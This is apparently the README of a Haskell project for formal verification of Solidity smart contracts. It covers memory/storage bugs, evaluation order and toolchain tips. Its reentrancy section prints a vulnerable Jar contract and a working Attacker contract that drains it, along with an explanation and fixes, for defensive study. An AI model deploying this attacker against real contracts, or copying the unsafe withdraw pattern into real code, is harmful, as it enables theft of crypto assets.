Skip to content

miyamok/smartcontract-verification

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

82 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Solidity Verification

The objective of this project is to develop software to practice formal verification of Solidity smart contracts. Due to the immutability of blockchain, the correctness of smart contract code is a crucial issue to secure crypto assets, because a flaw of a source code makes the smart contract vulnerable. It may cause a serious financial loss which in general cannot be recoverd, once it has happened. Formal verification allows us to check the smart contract code before its deployment. As a result, if the implementation is secure it mathematically proves the correctness of the smart contract, otherwise it points out what (potential) problems are there.

The final goal, the correctness of smartcontract, consists of pieces of correctness conditions, which for example includes:

  • No overflow, no underflow in arithmetic
  • No division by zero
  • No access to arrays exceeding the bounds
  • No unreachable code
  • No transfers with insufficient balance
  • No reentrancy
  • No selfdestruct reacheability

Usage

Haskell (GHC 9.2.8 checked to work), cabal (3.6.2.0 checked to work), Solidity compiler (solc 0.8.23 checked to work) are required. Download the source code from the repository or use git as follows

$ git clone https://github.com/miyamok/smartcontract-verification/

then move to the directory smartcontract-verification and issue

$ cabal run solidity-verification PATH/TO/YOUR/SOLIDITYPROGRAM.sol

Implemented features

Definition-use analysis

Definition-use analysis is to find from a definition its use. Here a definition means a value assignment to a variable, and a use means any operation referring to the assigned value. For example, in the following pseudo-code,

String greeting = "Hello, world"
print greeting

The first line is a definition of greeting and its use is found in the following line.

In case of Solidity, this analysis is useful to find a particular type of bug due to the memory/storage distinction.

Example

Here we discuss an example solidity program structs.sol. It is a smart contract for an online shop where the functionalities dealing with orders and payments are implemented.

The state variable orders is array of Order. It is a parsistent data and meant to record orders.

The function payment has a local variable order of struct type Order. As this is a storage variable, the initial assignment makes order point to orders[key], and future modification to order actually modified the state variable orders. The following lines check that

  • the caller of this function is indeed the buyer,
  • the caller of this function pays exactly the price of the order, and
  • the status of the order indicates that the payment is still awaited.

The last step of the function is the assignment. As described above, the local variable order is pointing orders[key], and orders[key].status gets the new value OrderStatus.Paid. This change is persistent, and in the future one can see that the payment has been completed.

Another function paymentForgetful has a problem, although it looks similar as payment. The difference is that the local variable order is declared as a memory variable, that means its initial value orders[key] is copied and future change via this local variable order affects this copy. At the end of this function, the assignment changes this copy, which is obviously diverged from the state variable, and this change is lost when the transaction is over. In the future, the order status still indicates unpaid even though the buyer has already paid!

Our tool gives a warning message concerning the local memory variable order as follows.

$ cabal run solidity-verification sample-solidity/structs.sol
In function paymentForgetful the following variables are not read after an assignment
"order" declared at line 44

This suggests that there is a potential issue, as there is a meaningless assigment.

Semantics

In this section, we describe what issues will be clarified as a result of studying semantics of Solidity.

Solidity's syntax looks similar as Java and Javascript, however the following simple arithmetical example shows that Solidity's semantics is different from the others.

int x=0;
int y=x + ++x;
return y;

While in Javascript (where we should write var instead of int) the return value is 1, in Solidity it is 2. In Javascript the evaluation goes from the left hand side of "+" to the right hand side. Hence the left hand side of "+" is 0 and the right hand side is 1, then finally the value of y is 1. In Solidity the evaluation goes in the opposite direction. The right hand side of "+" is 1, and then the left hand side is 1, therefore the final value of y is 2.

Although the above coding practice is not at all recommended, it is true that semantics is a delicate issue in formal verification. Studying formal semantics of Solidity is a crucial step to develop reliable formal verification methods.

Let's see arithmetical examples a bit more, which are understood as a consequence of the above observation.

int x=0;
x += x++;
int y=0;
y += ++y;

While in Javascript (again, use var instead of int in Javascript) the values of x and y become 0 and 1, in Solidity the values of x and y become 1 and 2, respectively. Although the meaning of a += b is a = a + b, that is same in the both languages, the computation order makes the results different.

int x=0;
x -= ++x;

The result x in Solidity is 0, while it is -1 in Javascript.

The tuple allows the following code in Solidity.

uint x = 0;
uint y;
uint z;
(y,z) = (x, ++x);

The values of y and z are respectively 0 and 1. The evaluation goes left to right in the case of tuple, and function arguments work in the same way.

There is another issue concerning the memory/storage distinction. Assume Person is a sturuct already defined, and there is a state variable vip of type Person.

Person memory p = vip;

Here, p gets the copy of data kept by vip. On the other hand, in the followng code, p gets a storage location of the state variable vip.

Person storage p = vip;

Although there can be several different formal semantics of Solidity language, one possible interpretation of the above example is that the right hand side of the assignment, vip, denotes something different between the two. In the first example, vip denotes the copy of the data which we can refer by vip, and in the second, vip denotes the storage location of itself.

To do

Reentrancy analysis

The vulnerability due to reentrancy is a major security problem of smart contract.

Example of reentrancy attack

The following contract, a coin jar, is vulnerable because of the way withdraw() has been implemented.

// SPDX-License-Identifier: MIT
pragma solidity >=0.6.12 <0.9.0;

contract Jar {

    mapping(address=>uint) public balance;

    constructor() payable {

    }

    function deposit() public payable {
        balance[msg.sender] += msg.value;
    }

    function withdraw() public {
        require(balance[msg.sender] != 0, "zero balance");
        (bool s,) = msg.sender.call{ value: balance[msg.sender] }("");
        require(s, "In Jar.withdrow(), call() failed.");
        balance[msg.sender] = 0;
    }
}

The expected use case is that anybody can make a deposit by calling deposit() with some value, and anytime in the future, the one can withdraw the deposit by calling withdraw(). The problem arises when one uses the following contract Attacker to attack Jar, assuming the above Solidity code is available as ./Jar.sol.

// SPDX-License-Identifier: MIT
pragma solidity >=0.6.12 <0.9.0;
import "./Jar.sol";

contract Attacker {

    Jar public jar;
    address public owner;

    constructor(address _jar) payable {
        jar = Jar(_jar);
        owner = msg.sender;
    }

    function deposit() public {
        jar.deposit{ value: 1 ether }();
    }

    function attack() public {
        jar.withdraw();
    }

    receive() external payable {
        if (address(jar).balance >= 1 ether) {
            jar.withdraw();
        }
    }

    function withdraw() public {
        require (msg.sender == owner);
        (bool s, ) = owner.call{ value: address(this).balance}("");
        require (s);
    }
}

The story goes in the following way. The process starts from attacker's calling deposit() of Attacker; the balance of the jar contract now keeps that the contract Attacker has 1 ETH deposit. Then the attacker calls attack(). The execution goes to withdraw() of Jar, where it first checks that the message sender, i.e. the contract Attacker has deposited some ETH, and next it makes a payout by means of call(); as commonly done, it transfers money by sending the empty call data, i.e. "", to the depositor. When the Attacker contract receives money, its receive() is executed. It checks that the jar contract has at least 1 ETH, and if so, it tries to further withdraw 1 ETH by calling withdraw() of the Jar contract, which causes the so-called reentrancy. As the condition balance[msg.sender] != 0 is still satisfied, the jar contract again sends 1 ETH to the attacker, and it repeats until the ETH asset balance of the victim goes less than 1 ETH.

Problem analysis

Jar sends money to an arbitrary address, that means, anybody who makes a deposit. Here, there is a possibility of its sending money to an unknown smart contract rather than an EOA (externally owned account). The prerequisite for successful withdrawal is that the balance balance[msg.sender] is positive. As the balance is not changed before the actual money transfer, the prerequisite is samely satisfied in case of a reentrancy, hence it repeatedly sends money. After the attacker stops the process, the the whole transaction will successfully be over without causing a revert; it just assigns 0 to balance[msg.sender] after all transfers were done.

Based on the above observation, our static program analyzer should issue a warning on a potential vulnerability due to the reentrancy attack, when there is a function which makes a money transfer such as:

  1. Preconditions of the money transfer may be satisfied in a recursive call.
  2. After carrying out the repeated money transfer, the transaction may successfully complete.

A commonly suggested cure for the vulnerability is to make use of mutex to prohibit the reentrancy. Changing the balance before invoking call is also a solution. On the other hand, if the business logic were to subtract the amount of the transferred money, it could cause a revert due to the underflow, and as a result, all unexpected sendings could be cancelled.

Implementation

TODO

Notes

TODO

External links

Miscellaneous memorandum

The rest of this page is a memorandum for the project.

Features of the Solidity compiler

The solidity compiler solc offers helpful features for preventing potential problems of smart contracts. Byte code compiled by solc version 0.8.4 or above equips the overflow checking, that is, when there was a runtime arithmetic overflow, it is automatically detected and the execution of the contract gets reverted. In contract to it, the older solc did not offer this feature, and hence the runtime overflow could lead an unrecoverable failure such as a permanent loss of assets.

Abstract syntax tree by solc

The official solidity compiler solc offers the option --ast-compact-json to output the abstract syntax tree in the JSON format. Our verification system relies on this feature of solc. The description of the solidity AST is available as https://solidity-ast.netlify.app/ .

LValue

In Solidity AST we often see information concerning LValue, that is for instance isLValue and lValueRequested. An expression is LValue if and only if it is a variable or something that can be assigned to.

For example, assume we have an expression something.property in Solidity. In case it is an enum, the isLValue of something is falase. On the other hand if it is a variable of struct type, the isLValue is true.

Conditionals

Solidity has two kinds of conditionals, namely, if-statement and the ternary expression b ? t : f. In the then clause, the verification process carries on assuming the condition holds, while the negation of the condition is taken in the verification of the else clause. One target of the verification is detecting an unreachable code segment.

Functions

A function definition comes inside a contract definition and it involves specifications for its name, parameters, return values, modifiers, and its body.

function f(uint8 x, uint8 y) public pure returns (uint16) {
    uint16 ret;
    // ...
    // ...
    return ret;
}

The above function has the name f, the parameter list contains two parameters uint8 x, uint8 y, the return type list contains uint16, which is a singleton list for this particular example, and the modifier public pure which means that this function is publically accessible and doesn't access storage data, neither reading nor writing. Alternatively the return variable list can be used instead of the type list, specifying

function f(uint8 x, uint8 y) public pure returns (uint16 z) {
    z = x+y;
}

The variable z of type uint16 is supporsed to have a return value, assigned through the execution of the body of the function, x+y for this case. Explicit return has a priority over the specified retuen variable name z.

function f(uint8 x, uint8 y) public pure returns (uint16 z) {
    z = 16;
    return x+y;
}

The result of f(4, 3) from the above definition is 7, not 16. This priority is same for functions returning several values with an incomplete variable name specification. solc (I tested on remix solc 0.8.24) compiles code containing the following function definition.

function add(uint x_, uint y_) internal pure returns (uint z, uint) {
    return (x_ + y_, 10);
}

Note that the first element of the return values comes with a variable name but the second one is without a variable name. This function returns (8, 10) for add(3, 5), while z should have the default value 0. In case return is missing as follows, solc gives a warinng message but it anyway compiles,

function add(uint x_, uint y_) internal pure returns (uint z, uint) {
    z = x_ + y_;
}

and the function call add(3, 1) gives (4, 0), filling the default value 0 of uint for the second return value. The same happens when the execution did not come to return even if there is return in the function body. (a presence of conditional makes such a case probable.)

Examples

Assume a conditional statement (namely, if-then-else) with a boolean expression b (namely, if (b) { ... }), then the execusion reaches the else clause if not b holds. If either b or not b is unsatisfiable, the then clause or the else clause is never executed, namely, is unreachable. The verifier issues a warning message respecting such an unreachable code.

In case a conditional statement is nested, the verification gets more complex. Assume the following code.

if (b1) {
  f1();
  if (b2) {
    g1();
  } else {
    g2();
  }
} else {
  f2();
}

The reachability of g2() is checked due to the satisfiability of b1 && !b2. Another example involving the ternary expression is

if (b1 && (x == (b2 ? y : z)) {
  f1();
} else {
  f2();
}

The reachability of y is checked by the satisfiability of b1 && b2, and the one of z is by b1 && !b2 On the other hand, the reachability of f1() is checked due to the satisfiability of b1 && ((b2 && x==y) || (!b2 && x==z)), and by its negation, the one of f2() is checked.

Arrays

Solidity offers both statically sized arrays and dynamically sized arrays.

Examples

Consider the following code, assuming solidity version is 0.8.20 or older.

uint256[3] nums;
uint256 x = 3;

nums[0] = 20;
nums[1] = 50;
nums[2] = 121;
nums[x] = 61;

The last substitution is out of bound, as the size of the array nums is 3, hence it causes a run-time error. This problem should be statically detected, and it is feasible due to known program analysis techniques.

Struct

Variables ranging over array and struct has a modifier such as memory, storage, or calldata, in order to indicate how those data are kept. Data on memory are not permanent, and changes are lost, as an example below, when the execution got out from the function scope.

function processData(account a) external {
    Data memory d = getData(a);
    d.processed = true;
}

A concrete case is found in the tutorial by Alchemy University (https://university.alchemy.com/overview/solidity), Section 3, Reference Types, Structs, around 20:00 in the video lecture. The problem shown in the lecture video is reproduced by modifying storage to memory at the line 34 of Example.sol in https://github.com/alchemyplatform/learn-solidity-presentations/blob/main/7-structs/examples/0-playing-with-structs/src/Example.sol

return

The nodeType of return in the AST output of solc is "Return", while in the grammer the corresponding rule is return-statement (cf. https://docs.soliditylang.org/en/latest/grammar.html#a4.SolidityParser.returnStatement). The AST output is in principle following the grammer definition, just using the CamelCase instead of the hyphen-separation, but it's not always the case and should be checked through the actual output AST from solc.

assert, require, revert

assert and require are always function, so the nodeType of those statements are ExpressionStatement. revert in Solidity ^0.8.0 is either a function or a statement. In case it comes with a string argument such as

revert "Error.  Abort.";

it is a function call and the nodeType of this statement is ExpressionStatement. If revert takes an Error object,

revert MyCustomError("Error, Aborted.", 121731);

the nodeType of this statement is RevertStatement.

Proxy contract

delegatecall is a function available for Contract. It is to call a function of some contract on chain, delegating to the contract the parameters, such as msg.sender, the context etc. A typical use case of this feature is to give a possibility of upgrading of smart contracts. In the simplest scenario, Instead of a single smart contract, one creates two contracts, they are so-called the logic contract and the proxy contract. The logic contract is in charge of the implementation of a business logic which could be upgraded in the future. The proxy contract has a state variable which keeps the address of the implementation contract, and it invokes the corresponding business logic via delegatecall. Upgrading of the business logic is done in two steps: deploying the new logic contract and changing the state variable of the proxy contract so that it points the new contract.

Question

What happens if the implementation has been changed after the moment one called the proxy and before the moment the contract is actually executed. If this change of the implementation is not detected, the contract can run differently from what is expected at the time to initiate the transaction, that arise a security concern.

Tips

Static Verification Feature of Solidity Compiler solc

solc has its own SMTChecker feature for compile time verification.

% solc test.sol --model-checker-targets all --model-checker-timeout 1000 --model-checker-solvers z3  --model-checker-engine chc

In order to enable this feature particularly by z3, one use Linux for dynamic library loading (libz3.so) or otherwise one has to re-compile the solc compiler with static library linking. Cf. ethereum/solidity#14014

The option --model-checker-print-query is used to show the smtlib2 model of the contract, eg. by

solc overflow.sol --model-checker-solvers smtlib2 --model-checker-targets overflow --model-checker-print-query

hardhat

The following setup procedure is successsful

% mkdir myProject && cd myProject
% npm install --save-dev --legacy-peer-deps hardhat
% npm install --legacy-peer-deps @nomiclabs/hardhat-waffle ethereum-waffle chai @nomiclabs/hardhat-ethers ethers@5.7.2 dotenv
% npm init -y
% npx hardhat

The version of ethers is specified to be 5.7.2, because the latest version has an issue for smart contract deployment. (cf. https://ethereum.stackexchange.com/questions/144451/typeerror-cannot-read-properties-of-undefined-reading-jsonrpcprovider) The above installation works if @5.7.2 is missing. One should think about changing the ethers version in case there is a trouble such as below during the deployment.

% npx hardhat run scripts/deploy.js
TypeError: Cannot read properties of undefined (reading 'JsonRpcProvider')
    at main (/tmp/myProject/scripts/deploy.js:10:41)

## The corresponding line of deploy.js:
## const provider = new ethers.providers.JsonRpcProvider(url);

The following is an unsuccessful procedure (to figure out why)

% mkdir myProject && cd myProject
% npm init -y
% npm install --save-dev hardhat
% npm install @nomiclabs/hardhat-waffle ethereum-waffle chai @nomiclabs/hardhat-ethers ethers@5.7.2 dotenv
% npx hardhat

chai.js@^5.0.0 with hardhat

In case there is an error such as follows,

% npx hardhat test
Downloading compiler 0.8.4
Compiled 1 Solidity file successfully (evm target: istanbul).
An unexpected error occurred:

Error [ERR_REQUIRE_ESM]: require() of ES Module /tmp/node_modules/chai/chai.js from /tmp/myProject/test/sample-test.js not supported.
Instead change the require of chai.js in /tmp/myProject/test/sample-test.js to a dynamic import() which is available in all CommonJS modules.
    at Object.<anonymous> (/tmp/myProject/test/sample-test.js:2:28) {
  code: 'ERR_REQUIRE_ESM'
}

downgrading chai.js to version 4 is a cure.

% npm install chai@4.3.7

Simply following the suggested solution by the error message, using import instead of require, does make another error.

TypeError: Cannot read properties of undefined (reading 'equal')
      at Context.<anonymous> (test/sample-test.js:21:12)

It is further to investigate why the suggestion doesn't work.

chai.js@5 is still new and seems not very stable. A discussion is found at chaijs/chai#1561 .